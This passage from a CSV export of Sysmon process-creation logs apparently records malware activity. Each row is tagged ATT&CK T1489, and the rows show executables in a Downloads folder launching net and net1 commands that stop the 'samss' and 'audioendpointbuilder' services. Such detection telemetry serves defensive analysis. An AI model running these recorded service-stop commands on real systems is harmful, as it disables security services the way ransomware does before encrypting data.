Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d23c-5ec7-0000-001089994000}"",""parentProcessId"":""290508"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:41:19.945",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:08.446 +ProcessGuid: {df9fc3d3-d23c-5ec7-0000-001023a04000} +ProcessId: 290572 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:08.460043700Z"",""eventRecordID"":""1344"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:08.446\r\nProcessGuid: {df9fc3d3-d23c-5ec7-0000-001023a04000}\r\nProcessId: 290572\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:08.446"",""processGuid"":""{df9fc3d3-d23c-5ec7-0000-001023a04000}"",""processId"":""290572"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:41:19.937",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:08.149 +ProcessGuid: {df9fc3d3-d23c-5ec7-0000-001089994000} +ProcessId: 290508 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:08.163605900Z"",""eventRecordID"":""1343"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:08.149\r\nProcessGuid: {df9fc3d3-d23c-5ec7-0000-001089994000}\r\nProcessId: 290508\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:08.149"",""processGuid"":""{df9fc3d3-d23c-5ec7-0000-001089994000}"",""processId"":""290508"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:41:19.253",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:57.690 +ProcessGuid: {df9fc3d3-d231-5ec7-0000-0010e8ae3f00} +ProcessId: 277220 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d230-5ec7-0000-0010b3963f00} +ParentProcessId: 275576 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:57.757107000Z"",""eventRecordID"":""1270"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:57.690\r\nProcessGuid: {df9fc3d3-d231-5ec7-0000-0010e8ae3f00}\r\nProcessId: 277220\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d230-5ec7-0000-0010b3963f00}\r\nParentProcessId: 275576\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:57.690"",""processGuid"":""{df9fc3d3-d231-5ec7-0000-0010e8ae3f00}"",""processId"":""277220"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d230-5ec7-0000-0010b3963f00}"",""parentProcessId"":""275576"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:41:19.017",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:57.205 +ProcessGuid: {df9fc3d3-d231-5ec7-0000-0010e19e3f00} +ProcessId: 276348 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d230-5ec7-0000-001079923f00} +ParentProcessId: 275408 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:57.209559700Z"",""eventRecordID"":""1234"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:57.205\r\nProcessGuid: {df9fc3d3-d231-5ec7-0000-0010e19e3f00}\r\nProcessId: 276348\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d230-5ec7-0000-001079923f00}\r\nParentProcessId: 275408\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:57.205"",""processGuid"":""{df9fc3d3-d231-5ec7-0000-0010e19e3f00}"",""processId"":""276348"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d230-5ec7-0000-001079923f00}"",""parentProcessId"":""275408"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:41:19.008",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:56.885 +ProcessGuid: {df9fc3d3-d230-5ec7-0000-0010b3963f00} +ProcessId: 275576 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:56.897986900Z"",""eventRecordID"":""1233"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:56.885\r\nProcessGuid: {df9fc3d3-d230-5ec7-0000-0010b3963f00}\r\nProcessId: 275576\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:56.885"",""processGuid"":""{df9fc3d3-d230-5ec7-0000-0010b3963f00}"",""processId"":""275576"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:41:19.002",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:56.667 +ProcessGuid: {df9fc3d3-d230-5ec7-0000-001079923f00} +ProcessId: 275408 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:56.680196600Z"",""eventRecordID"":""1232"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:56.667\r\nProcessGuid: {df9fc3d3-d230-5ec7-0000-001079923f00}\r\nProcessId: 275408\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:56.667"",""processGuid"":""{df9fc3d3-d230-5ec7-0000-001079923f00}"",""processId"":""275408"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:41:18.983",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:54.798 +ProcessGuid: {df9fc3d3-d22e-5ec7-0000-0010346a3f00} +ProcessId: 272192 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d22a-5ec7-0000-0010e43f3f00} +ParentProcessId: 269684 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:54.926710200Z"",""eventRecordID"":""1231"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:54.798\r\nProcessGuid: {df9fc3d3-d22e-5ec7-0000-0010346a3f00}\r\nProcessId: 272192\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® 